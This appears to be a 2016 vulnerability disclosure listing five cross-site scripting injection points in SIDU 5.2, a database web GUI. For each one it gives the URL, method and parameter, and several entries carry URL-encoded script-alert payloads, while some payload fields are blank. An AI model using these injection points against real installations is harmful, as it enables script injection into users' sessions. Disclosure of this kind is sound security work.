########################################################################################
# Exploit Title: SIDU 5.2 Database Web GUI Multiple XSS Vulnerabilities
# Date: 04.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://topnew.net/sidu/
# Software Link: https://sourceforge.net/projects/sidu/files/sidu/sidu52.zip
# Version: [app version] 5.2
########################################################################################
XSS details:
########################################################################################
XSS1
URL
http://localhost/sidu52/conn.php
METHOD
Post
PARAMETER
conn[dbs]
PAYLOAD
########################################################################################
XSS2
URL
http://localhost/sidu52/?id=1
METHOD
Post
PARAMETER
sqlcur
PAYLOAD
########################################################################################
XSS3
URL
http://localhost/sidu52/sql.php?id=1&sql=%3Cscript%3Ealert%283%29%3C/script%3E
METHOD
Get
PARAMETER
sql
PAYLOAD
########################################################################################
XSS4
URL
http://localhost/sidu52/user.php?id=1,,,,,,%27%3E%3Cscript%3Ealert%284%29%3C/script%3E
METHOD
Post
PARAMETER
id
PAYLOAD
'>
########################################################################################
XSS5
URL
http://localhost/sidu52/bChart.php?ses=%3Cscript%3Ealert%285%29%3C/script%3E
METHOD
Post
PARAMETER
id
PAYLOAD
########################################################################################